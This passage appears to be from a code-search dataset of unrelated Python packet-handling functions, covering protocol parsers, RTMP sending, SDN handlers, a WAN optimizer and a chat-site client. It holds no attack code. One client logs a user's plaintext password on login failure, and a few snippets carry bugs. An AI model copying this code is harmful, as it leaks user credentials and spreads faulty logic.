mac])\n\t\tfields.append(['Frame Type', packet.frameType, mac])\n\t\tfields.append(['Security enabled', packet.securityEnabled, mac])\n\t\tfields.append(['Frame pending', packet.framePending, mac])\n\t\tfields.append(['Ack. request', packet.ackRequest, mac])\n\t\tfields.append(['Intra-PAN', packet.intraPAN, mac])\n\t\tfields.append(['Dest. addressing mode', packet.dstAddrMode, mac])\n\t\tfields.append(['Source addressing mode', packet.srcAddrMode, mac])\n\t\tfields.append(['Sequence number', packet.seqNumber, mac])\n\t\t\n\t\tif hasattr(packet, 'dstPANID'):\n\t\t\tfields.append(['Destination PAN-ID', packet.dstPANID, mac])\n\t\t\n\t\tif hasattr(packet, 'dstAddr'):\n\t\t\tfields.append(['Destination address', packet.dstAddr, mac])\n\t\t\n\t\tif hasattr(packet, 'srcPANID'):\n\t\t\tfields.append(['Source PAN-ID', packet.srcPANID, mac])\n\t\t\t\n\t\tif hasattr(packet, 'srcAddr'):\n\t\t\tfields.append(['Source address', packet.srcAddr, mac])\n\t\t\t\n\t\tif hasattr(packet, 'payload'):\n\t\t\tfields.append(['Payload', packet.payload, mac])\n\t\t\n\t\tif hasattr(packet, 'commandType'):\n\t\t\tfields.append(['Command type', packet.commandType, mac])\n\t\t\n\t\tif hasattr(packet, 'commandPayload'):\n\t\t\tfields.append(['Command payload', packet.commandPayload, mac])\n\t\t\n\t\tif hasattr(packet, 'superFrameSpec'):\n\t\t\tfields.append(['Superframe specification', packet.superFrameSpec, mac])\n\t\t\tsfs = len(fields) - 1\n\t\t\tfields.append(['Beacon order', packet.beaconOrder, sfs])\n\t\t\tfields.append(['Superframe order', packet.superFrameOrder, sfs])\n\t\t\tfields.append(['finalCAPSlot', packet.finalCAPSlot, sfs])\n\t\t\tfields.append(['Batt. life extension', packet.battLifeExt, sfs])\n\t\t\tfields.append(['PAN Coordinator', packet.PANCoord, sfs])\n\t\t\tfields.append(['Association permit', packet.assocPermit, sfs])\n\t\t\n\t\tif hasattr(packet, 'GTS'):\n\t\t\tfields.append(['GTS specification', packet.GTS, mac])\n\t\t\tgts = len(fields) - 1\n\t\t\tfields.append(['GTS descriptor count', packet.GTSDescrCount, gts])\n\t\t\tfields.append(['GTS permit', packet.GTSPermit, gts])\n\t\t\tif int(packet.GTSDescrCount, 16) > 0:\n\t\t\t\tfields.append(['GTS directions', packet.GTSDirections, gts])\n\t\t\t\tfields.append(['GTS descriptors list', '', gts])\n\t\t\t\tdscList = len(fields) - 1\n\t\t\t\tfor i in xrange(int(packet.GTSDescrCount, 16)):\n\t\t\t\t\tfields.append(['Descriptor #'+str(i), '', dscList])\n\t\t\t\t\td = len(fields) - 1\n\t\t\t\t\tfields.append(['Device short address', packet.GTSDescriptors[i].deviceShortAddr, d])\n\t\t\t\t\tfields.append(['GTS starting slot', packet.GTSDescriptors[i].GTSStartingSlot, d])\n\t\t\t\t\tfields.append(['GTS length', packet.GTSDescriptors[i].GTSLength, d])\n\t\t\t\n\t\t\tfields.append(['Pending addresses list', '', gts])\n\t\t\tpnd = len(fields) - 1\n\t\t\tif int(packet.numShortAddrPnd, 16) > 0 or int(packet.numShortAddrPnd, 16) > 0:\n\t\t\t\tfor i in xrange(int(self.numShortAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Short addr. #%i' % i, packet.shortAddrPndList[i], pnd])\n\n\t\t\t\tfor i in xrange(int(self.numLongAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Long addr. #%i' % i, packet.longAddrPndList[i], pnd])\n\t\t\n\t\tif hasattr(packet, 'bcnPayload'):\n\t\t\tfields.append(['Beacon payload', packet.bcnPayload, mac])\n\t\t\n\t\tself.beginInsertRows(QModelIndex(), 0, len(self.fields)+1)\n\t\tself.endInsertRows()\n\t\tfor field in fields:\n\t\t\tprint field", "def spoof_packet(packet):", "def packetReceived(self, packet):\n for layer in packet:\n if (layer.layer_name == 'fmtp' and\n int(layer.type) == 1):\n # Data is stored as a hexadecimal string in the XML file\n # generated by tshark\n data = binascii.unhexlify(layer.data)\n log.msg(\"FMTP message received: {}\".format(data))", "def _on_message(self, packet: Packet, channel_id: str):\n live_run = self.get_live_run()\n # TODO(#102) this method currently assumes that the packet's subject_id will\n # always be a valid agent in our list of agent_infos. This isn't always the case\n # when relaunching with the same URLs.\n with PACKET_PROCESSING_LATENCY.labels(packet_type=packet.type).time():\n if packet.type == PACKET_TYPE_SUBMIT_ONBOARDING:\n self._on_submit_onboarding(packet, channel_id)\n elif packet.type == PACKET_TYPE_SUBMIT_UNIT:\n self._on_submit_unit(packet, channel_id)\n self.log_metrics_for_packet(packet)\n self.last_submission_time = time.time()\n elif packet.type == PACKET_TYPE_SUBMIT_METADATA:\n self._on_submit_metadata(packet)\n elif packet.type == PACKET_TYPE_MEPHISTO_BOUND_LIVE_UPDATE:\n update_id = packet.data.get(\"update_id\")\n if update_id is not None and update_id in self.seen_update_ids:\n return # Processing duplicated packet\n self._on_live_update(packet, channel_id)\n self.log_metrics_for_packet(packet)\n self.seen_update_ids.add(update_id)\n elif packet.type == PACKET_TYPE_REGISTER_AGENT:\n self._register_agent(packet, channel_id)\n elif packet.type == PACKET_TYPE_RETURN_STATUSES:\n # Record this status response\n live_run.worker_pool.handle_updated_agent_status(packet.data)\n self.log_metrics_for_packet(packet)\n elif packet.type == PACKET_TYPE_ERROR:\n self._log_frontend_error(packet)\n self.log_metrics_for_packet(packet)\n else:\n # PACKET_TYPE_REQUEST_STATUSES, PACKET_TYPE_ALIVE,\n # PACKET_TYPE_CLIENT_BOUND_LIVE_UPDATE, PACKET_TYPE_AGENT_DETAILS\n raise Exception(f\"Unexpected packet type {packet.type}\")", "def update(self, packet):\n raise NotImplementedError", "def packet_queue(self, pkt):\n \n pkt.pos = 0\n pkt.to_process = pkt.packet_length\n \n self.out_packet.append(pkt)\n return NC.ERR_SUCCESS", "def send_pkt(self, pkt_tuple):\r\n pkt_str = str(pkt_tuple[0])\r\n tuser = pkt_tuple[1]\r\n while len(pkt_str) > self.bus_width:\r\n # at least one more word of this packet after this one\r\n tdata = pkt_str[0:self.bus_width]\r\n tvalid = 1\r\n tkeep = (1<<self.bus_width)-1\r\n tlast = 0\r\n msg = AXI_S_message(tdata, tvalid, tkeep, tlast, tuser)\r\n self.out_pipe.put(msg)\r\n yield self.wait_sys_clks(1)\r\n pkt_str = pkt_str[self.bus_width:]\r\n # this is the last word of the packet\r\n tdata = pkt_str + '\\x00'*(self.bus_width - len(pkt_str))\r\n tvalid = 1\r\n tkeep = (1<<len(pkt_str))-1\r\n tlast = 0\r\n msg = AXI_S_message(tdata, tvalid, tkeep, tlast, tuser)\r\n self.out_pipe.put(msg)", "def send_packet(self, packet):\n # print('sending packet')\n\n # If the packet was not set up, then make sure we have the body buffer ready to write.\n if packet.body_buffer is None:\n # print('body buffer was none')\n packet.setup()\n\n # print('we set up the packet')\n\n # DONE: stream.flush() is called automatically after the packet has been sent.\n # Flush file-object.\n self.stream_flush()\n\n # print('flushed stream')\n\n # TODO: Sort whether to use the stream id or not, we will only use it at the beginning of a new chunk stream.\n # if send_packet.header.chunk_stream_id not in self.chunk_channels:\n # self.chunk_channels.append(send_packet.header.chunk_stream_id)\n # else:\n # send_packet.header.chunk_type = 1\n # send_packet.header.stream_id = -1\n\n # TODO: Sort out the timestamp/timestamp delta for the packet.\n # if send_packet.header.timestamp is -1:\n # if self.timestamp is None:\n # self.timestamp = 0\n # else:\n # self.timestamp = (int(time.time())/1000) - (int(time.time()/1000))\n # Set the current timestamp as the timestamp in the header for the RtmpPacket.\n # send_packet.header.timestamp = self.timestamp\n\n # Encode the initial header before the main RTMP message.\n # rtmp_header.encode(self._rtmp_stream, packet.header)\n self._rtmp_header_handler.encode_into_stream(packet.header)\n\n # print('encoded first header into stream')\n\n # TODO: We need to chunk all formats message bodies, however we need to put into perspective\n # whether message that are to be sent are related to one another and what format it needs to be.\n\n # Write chunks into the stream.\n for i in xrange(0, packet.header.body_length, self.chunk_size):\n write_size = i + self.chunk_size\n chunk = packet.body_buffer[i:write_size]\n self._rtmp_stream.write(chunk)\n # print('writing chunk')\n\n # TODO: Why is the previous in the header encode always 0?\n # We keep on encoding a header for each part of the packet body we send, until it is equal to\n # or exceeds the length of the packet body.\n if write_size < packet.header.body_length:\n # print('continuing chunks')\n # We provide the previous packet we encoded to provide context into what we are sending.\n # TODO: The rtmp_stream is None when entering here.\n # rtmp_header.encode(self._rtmp_stream, packet.header, packet.header)\n self._rtmp_header_handler.encode_into_stream(packet.header)\n\n # print('all chunks written')\n\n # TODO: Moved to now using the RtmpPacket body as the PyAMF buffered bytestream, do we need a separate\n # variable for this, and if so, do we need to have a reset body function to reset the body?\n\n # print('[Written] %s' % repr(send_packet.header))\n\n # TODO: If we do not flush the stream after sending one packet, we might not get the reply after a while.\n self.stream_flush()", "def _handle_ordered_packet(self, packet):\n pass", "def sendPacket(self, pack):\n\t\t\n\t\tself.sendCall(pack)", "def packetReceived(self, header, body):\n raise NotImplementedError(\"Abstract method must be overridden\")", "def send_packet(self, pk):\n try:\n self.out_queue.put(pk, True, 2)\n except queue.Full:\n if self.link_error_callback:\n self.link_error_callback('RadioDriver: Could not send packet'\n ' to copter')", "def handle_packet(self, clw, address, connection, channel, name, packet, db):\n command = clw.head.command\n request = None\n if command == GATEWAY.T_MESSAGE_TYPE.LOGIN: # T1\n logging.info(\"[GW] Thread%s recv login packet:\\n%s\", name, packet)\n login.handle_login(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis) \n elif command == GATEWAY.T_MESSAGE_TYPE.HEARTBEAT: # T2\n logging.info(\"[GW] Thread%s recv heartbeat packet:\\n%s\", name, packet)\n heartbeat.handle_heartbeat(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.LOCATIONDESC: # T10\n logging.info(\"[GW] Thread%s recv locationdesc packet:\\n%s\", name, packet)\n locationdesc.handle_locationdesc(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.CONFIG: # T17\n logging.info(\"[GW] Thread%s recv query config packet:\\n%s\", name, packet)\n config.handle_config(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.DEFENDSTATUS: # T18, #NOTE: deprecated\n logging.info(\"[GW] Thread%s recv defend status packet:\\n%s\", name, packet)\n defend.handle_defend(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.FOBINFO: # T19 #NOTE: deprecated \n logging.info(\"[GW] Thread%s recv fob info packet:\\n%s\", name, packet)\n fob.handle_fob_info(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.SLEEPSTATUS: # T21\n logging.info(\"[GW] Thread%s recv sleep status packet:\\n%s\", name, packet)\n sleep.handle_sleep(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.FOBSTATUS: # T22, #NOTE: deprecated\n logging.info(\"[GW] Thread%s recv fob status packet:\\n%s\", name, packet)\n fob.handle_fob_status(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.RUNTIMESTATUS: # T23\n logging.info(\"[GW] Thread%s recv runtime status packet:\\n%s\", name, packet)\n runtime.handle_runtime(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.UNBINDSTATUS: # T24\n logging.info(\"[GW] Thread%s recv unbind status packet:\\n%s\", name, packet)\n unbind.handle_unbind_status(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.UNUSUALACTIVATE: # T27\n logging.info(\"[GW] Thread%s recv unusual activate packet:\\n%s\", name, packet)\n unusual.handle_unusual(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.MISC: # T28\n logging.info(\"[GW] Thread%s recv misc packet:\\n%s\", name, packet)\n misc.handle_misc(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.ACC_STATUS: # T30\n logging.info(\"[GW] Thread%s recv power status packet:\\n%s\", name, packet)\n acc.handle_acc_status(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.ACC_STATUS_REPORT: # T31\n logging.info(\"[GW] Thread%s recv power status report packet:\\n%s\", name, packet)\n acc.handle_acc_status_report(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n else: #NOTE: otherswill be forwar to SI server\n #(T13, T14, T15, T16, T26, T29) \n logging.info(\"[GW] Thread%s recv packet from terminal:\\n%s\", name, packet)\n self.foward_packet_to_si(clw, packet, address, connection, channel, db)", "def _process_packet(self, packet):\r\n fctype = packet.fctype\r\n if fctype == FCTYPE.LOGIN:\r\n if packet.narg1 != 0:\r\n log.info(\"Login failed for user '{}' password '{}'\"\r\n .format(self.username, self.password))\r\n raise Exception(\"Login failed\")\r\n else:\r\n self.session_id = packet.nto\r\n self.uid = packet.narg2\r\n self.username = packet.smessage\r\n log.info(\"Login handshake completed. Logged in as '{}' with sessionId {}\"\r\n .format(self.username, self.session_id))\r\n elif fctype in (FCTYPE.DETAILS, FCTYPE.ROOMHELPER, FCTYPE.SESSIONSTATE,\r\n FCTYPE.ADDFRIEND, FCTYPE.ADDIGNORE, FCTYPE.CMESG,\r\n FCTYPE.PMESG, FCTYPE.TXPROFILE, FCTYPE.USERNAMELOOKUP,\r\n FCTYPE.MYCAMSTATE, FCTYPE.MYWEBCAM):\r\n if not ((fctype == FCTYPE.DETAILS and packet.nfrom == FCTYPE.TOKENINC)\r\n or (fctype == FCTYPE.ROOMHELPER and packet.narg2 < 100)\r\n or (fctype == FCTYPE.JOINCHAN and packet.narg2 == FCCHAN.PART)):\r\n if isinstance(packet.smessage, dict):\r\n user_level = packet.smessage.setdefault(\"lv\", None)\r\n user_id = packet.smessage.setdefault(\"uid\", None)\r\n if user_id is None:\r\n user_id = packet.aboutmodel.uid\r\n if (user_id != None and user_id != -1\r\n and (user_level != None or user_level == 4)):\r\n possiblemodel = Model.get_model(user_id, user_level == 4)\r\n if possiblemodel != None:\r\n possiblemodel.merge(packet.smessage)\r\n elif fctype == FCTYPE.TAGS:\r\n if isinstance(packet.smessage, dict):\r\n # Sometimes TAGS are so long that they're malformed JSON.\r\n # For now, just ignore those cases.\r\n for key, value in packet.smessage.items():\r\n possible_model = Model.get_model(int(key))\r\n if possible_model != None:\r\n possible_model.merge_tags(value)\r\n elif fctype == FCTYPE.BOOKMARKS:\r\n if \"bookmarks\" in packet.smessage and isinstance(packet.smessage[\"bookmarks\"], list):\r\n for bookmark in packet.smessage[\"bookmarks\"]:\r\n possible_model = Model.get_model(bookmark[\"uid\"])\r\n if possible_model != None:\r\n possible_model.merge(bookmark)\r\n elif fctype == FCTYPE.METRICS:\r\n # Note that after MFC server updates on 2017-04-18, Metrics packets are rarely,\r\n # or possibly never, sent\r\n pass\r\n elif fctype == FCTYPE.EXTDATA:\r\n if packet.nto == self.session_id and packet.narg2 == FCWOPT.REDIS_JSON:\r\n self._handle_extdata(packet.smessage)\r\n elif fctype == FCTYPE.MANAGELIST:\r\n if packet.narg2 > 0 and \"rdata\" in packet.smessage:\r\n rdata = self._process_list(packet.smessage[\"rdata\"])\r\n ntype = packet.narg2\r\n if ntype in (FCL.ROOMMATES, FCL.CAMS, FCL.FRIENDS, FCL.IGNORES) and isinstance(rdata, list):\r\n for payload in rdata:\r\n possible_model = Model.get_model(payload[\"uid\"], payload[\"lv\"] == FCLEVEL.MODEL)\r\n if possible_model != None:\r\n possible_model.merge(payload)\r\n if ntype == FCL.CAMS and not self._completed_models:\r\n self._completed_models = True\r\n self.emit(FCTYPE.CLIENT_MODELSLOADED)\r\n elif ntype == FCL.TAGS and isinstance(rdata, dict):\r\n for key, value in rdata.items():\r\n possible_model = Model.get_model(key)\r\n if possible_model != None:\r\n possible_model.merge_tags(value)\r\n if not self._completed_tags:\r\n self._completed_tags = True\r\n self.emit(FCTYPE.CLIENT_TAGSLOADED)\r\n elif fctype == FCTYPE.TKX:\r\n if \"cxid\" in packet.smessage and \"tkx\" in packet.smessage and \"ctxenc\" in packet.smessage:\r\n self.stream_cxid = packet.smessage[\"cxid\"]\r\n self.stream_password = packet.smessage[\"tkx\"]\r\n parts = packet.smessage[\"ctxenc\"].split(\"/\")\r\n self.stream_vidctx = parts[1] if len(parts) > 1 else packet.smessage[\"ctxenc\"]", "def process_byte(self, byte):\r\n if self.index == -1:\r\n if byte == 0xff:\r\n self.index = 0\r\n self.checksum = 0\r\n elif self.index == 0:\r\n if byte != 0xff:\r\n self.checksum += byte\r\n self.pkt_bytes[0] = byte\r\n self.index += 1\r\n else:\r\n self.checksum += byte\r\n self.pkt_bytes[self.index] = byte\r\n self.index += 1\r\n if self.index == 7: # packet complete\r\n self.index = -1\r\n if self.checksum & 0xff != 0xff:\r\n return CommanderRx.CHECKSUM\r\n self.lookv = self.pkt_bytes[0] - 128 # 0 - 255 ==> -128 - 127\r\n self.lookh = self.pkt_bytes[1] - 128\r\n self.walkv = self.pkt_bytes[2] - 128\r\n self.walkh = self.pkt_bytes[3] - 128\r\n self.button = self.pkt_bytes[4]\r\n self.ext = self.pkt_bytes[5]\r\n return CommanderRx.SUCCESS\r\n return CommanderRx.NOT_DONE", "def Parse(self):\n prev_percent_read = 0\n for packet in TS.next_packet(self._filename):\n #check_packet_formedness(packet)\n pei = TS.get_transport_error_indicator(packet)\n pusi = TS.get_payload_start(packet)\n pid = TS.get_pid(packet)\n tsc = TS.get_tsc(packet)\n\n # per .ts packet handler\n if self.OnTSPacket:\n self.OnTSPacket(packet)\n\n # Update a progress callback\n self._read_size += TS.PACKET_SIZE\n percent_read = ((self._read_size / float(self._total_filesize)) * 100)\n new_percent_read = int(percent_read * 100)\n if new_percent_read != prev_percent_read and self.Progress:\n self.Progress(self._read_size, self._total_filesize, percent_read)\n prev_percent_read = new_percent_read\n\n adaptation_field_control = TS.get_adaptation_field_control(packet)\n continuity_counter = TS.get_continuity_counter(packet)\n\n # put together PES from payloads\n payload = TS.get_payload(packet)\n if pusi == True:\n if not ES.pes_packet_check_formedness(payload):\n if pid in self._elementary_streams:\n self._elementary_streams[pid] = None\n continue\n pes_id = ES.get_pes_stream_id(payload)\n self._elementary_streams[pid] = payload\n else:\n if pid in self._elementary_streams:\n # TODO: check packet sequence counter\n if not self._elementary_streams[pid]:\n self._elementary_streams[pid] = \"\"\n self._elementary_streams[pid] += payload\n else:\n # TODO: throw. this situaiton means out of order packets\n pass\n if pid in self._elementary_streams and ES.pes_packet_complete(self._elementary_streams[pid]):\n # TODO: handle packet contents here (callback)\n es = self._elementary_streams[pid]\n if self.OnESPacket:\n header_size = ES.get_pes_header_length(es)\n self.OnESPacket(pid, es, header_size)", "def forward(self, srcip, packet): #gets entire packet and srcip of that packet\n # get route to send packet\n best_route = self.get_route(srcip, packet[DEST]) #is a socket\n\n sock = best_route\n\n\n jsonpack = json.dumps(packet)\n sock.sendall(jsonpack.encode())\n # TODO fix src and dest\n return True", "def _process_fin_packet(self, rudp_packet):\n self.shutdown()", "def send_packet(self, raw_packet):\n\n if self.verbose:\n print(\"< %s\" % \" \".join(\"%02x\" % i for i in raw_packet))\n\n # Send the data to the device.\n self.ftdi.write(self.ftdi.INTERFACE_A, raw_packet, async_=False)", "def to_network_layer(packet):\r\n print(f\"[to_network_layer] packet:{packet}\")", "def __parse_tree(self, packet):\n info = extract_int_data(packet[Ether])\n logger.info('Processing packet with info [%s]', info)\n\n macs = search.findall_by_attr(self.tree, info.get('srcMac'),\n name='name', maxlevel=2, maxcount=1)\n\n mac = None\n src_ip = None\n dst_ip = None\n dst_port = None\n packet_size = None\n\n if len(macs) > 0:\n mac = macs[0]\n src_ips = search.findall_by_attr(\n mac, info.get('srcIP'), name='name', maxlevel=2, maxcount=1)\n if len(src_ips) is not 0:\n src_ip = src_ips[0]\n dst_ips = search.findall_by_attr(\n src_ip, info.get('dstIP'), name='name', maxlevel=2,\n maxcount=1)\n if len(dst_ips) is not 0:\n dst_ip = dst_ips[0]\n logger.info('Processing source IPs - %s', src_ips)\n dst_ports = search.findall_by_attr(\n dst_ip, info.get('dstPort'), name='name',\n maxlevel=2, maxcount=1)\n if len(dst_ports) is not 0:\n dst_port = dst_ports[0]\n packet_sizes = search.findall_by_attr(\n dst_port, info.get('packet_size'),\n name='name', maxlevel=2, maxcount=1)\n if len(packet_sizes) is not 0:\n packet_size = packet_sizes[0]\n\n return mac, src_ip, dst_ip, dst_port, packet_size", "def parse(self, data):\n self._readahead.write(data)\n buf = self._readahead.getvalue()\n if len(buf) < 4:\n return\n while len(buf) >= 4:\n size = int(buf[:4], 16)\n if size == 0:\n self.handle_pkt(None)\n buf = buf[4:]\n elif size <= len(buf):\n self.handle_pkt(buf[4:size])\n buf = buf[size:]\n else:\n break\n self._readahead = BytesIO()\n self._readahead.write(buf)", "def receive(self, packet):\n if packet.dest in self.address_to_port:\n # The packet is destined to one of the clients connected to this middlebox;\n # send the packet there.\n # if packet.is_fin:\n # print(\"2nd wan sees a fin\")\n\n if packet.is_fin and len(packet.payload) == 0:\n # print(\"empty fin, foward fin\")\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n block_hash = get_hash(pack_buff)\n if block_hash not in self.hash_to_raw_data.keys():\n self.hash_to_raw_data[block_hash] = pack_buff\n self.send_data_in_packets(packet.src, packet.dest, True, False, pack_buff, is_wan_port = False)\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\" # reset buffer\n self.send(packet, self.address_to_port[packet.dest]) # forward empty fin\n return\n \n if (packet.src, packet.dest) not in self.srcdest_to_buffer.keys():\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n \n if packet.is_raw_data:\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n pack_buff += packet.payload\n\n block_list, remaining_buff = self.break_data_into_blocks(pack_buff)\n for block_to_send in block_list:\n block_hash = get_hash(block_to_send)\n # print(\"sending1\")\n if block_hash in self.hash_to_raw_data.keys():\n # send extract data from hash in packet\n block_to_send = self.hash_to_raw_data[block_hash]\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n\n if remaining_buff:\n # print(\"wan to client remaining_buff: \" + remaining_buff)\n if packet.is_fin:\n block_hash = get_hash(remaining_buff)\n block_to_send = remaining_buff\n # print(\"sending2\")\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n # print(\"sending fin1\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n pack_buff = \"\"\n else:\n pack_buff = remaining_buff\n else:\n pack_buff = \"\"\n if packet.is_fin:\n # print(\"sending fin2\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n self.srcdest_to_buffer[(packet.src, packet.dest)] = pack_buff\n else:\n block_hash = packet.payload\n block_to_send = self.hash_to_raw_data[block_hash]\n # print(\"sending3\")\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n if packet.is_fin:\n # print(\"sending fin3\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n # self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\" # TESTING\n else:\n # The packet must be destined to a host connected to the other middlebox\n # so send it across the WAN.\n if packet.is_fin and len(packet.payload) == 0:\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n block_hash = get_hash(pack_buff)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = pack_buff\n self.send_data_in_packets(packet.src, packet.dest, True, False, pack_buff, is_wan_port = True)\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n self.send(packet, self.wan_port)\n return\n\n if (packet.src, packet.dest) not in self.srcdest_to_buffer.keys():\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n\n pack_buff += packet.payload\n block_list, remaining_buff = self.break_data_into_blocks(pack_buff)\n\n # send off all completed blocks\n for block_to_send in block_list:\n block_hash = get_hash(block_to_send)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = True)\n\n if remaining_buff:\n # print(\"wan to wan remaining_buff: \" + remaining_buff)\n if packet.is_fin:\n # print(\"finfin\")\n block_to_send = remaining_buff\n block_hash = get_hash(block_to_send)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = True)\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.wan_port)\n pack_buff = \"\"\n else:\n pack_buff = remaining_buff\n else:\n pack_buff = \"\"\n self.srcdest_to_buffer[(packet.src, packet.dest)] = pack_buff", "def packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n inPort = msg.match['in_port']\n\n packet = Packet(msg.data)\n etherFrame = packet.get_protocol(ethernet)\n\n if etherFrame.ethertype == ether.ETH_TYPE_LLDP:\n # ignore lldp packet\n return\n\n if etherFrame.ethertype == ether.ETH_TYPE_ARP:\n self.receive_arp(datapath, packet, etherFrame, inPort)\n elif etherFrame.ethertype == ether.ETH_TYPE_IP:\n self.receive_ip(datapath, packet, etherFrame, inPort)\n else:\n LOG.debug(\"receive Unknown packet %s => %s (port%d)\"\n % (etherFrame.src, etherFrame.dst, inPort))\n self.print_etherFrame(etherFrame)\n LOG.debug(\"Drop packet\")\n return 1\n return 0", "def _handle_PacketIn(self, event):\n\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n\n # Comment out the following line and uncomment the one after\n # when starting the exercise.\n # self.act_like_hub(packet, packet_in)\n # self.act_like_switch(packet, packet_in)\n self.act_like_router(packet, packet_in)", "def parse_packet(packet, traffic_type, pkt_type, exp_dst, step):\n packet_count = 0\n if(traffic_type == \"encap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect encapsulation'\n print(\"Correct encapsulation\")\n\n elif(traffic_type == \"decap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect decapsulation'\n print(\"Correct decapsulation\")", "def _process_frame(self, timestamp: Timestamp, frame: SerialFrame) -> None:\n assert frame.data_specifier == self._specifier.data_specifier, \"Internal protocol violation\"\n self._statistics.frames += 1\n\n transfer: typing.Optional[pyuavcan.transport.TransferFrom]\n if frame.source_node_id is None:\n transfer = TransferReassembler.construct_anonymous_transfer(timestamp, frame)\n if transfer is None:\n self._statistics.errors += 1\n _logger.debug(\"%s: Invalid anonymous frame: %s\", self, frame)\n else:\n transfer = 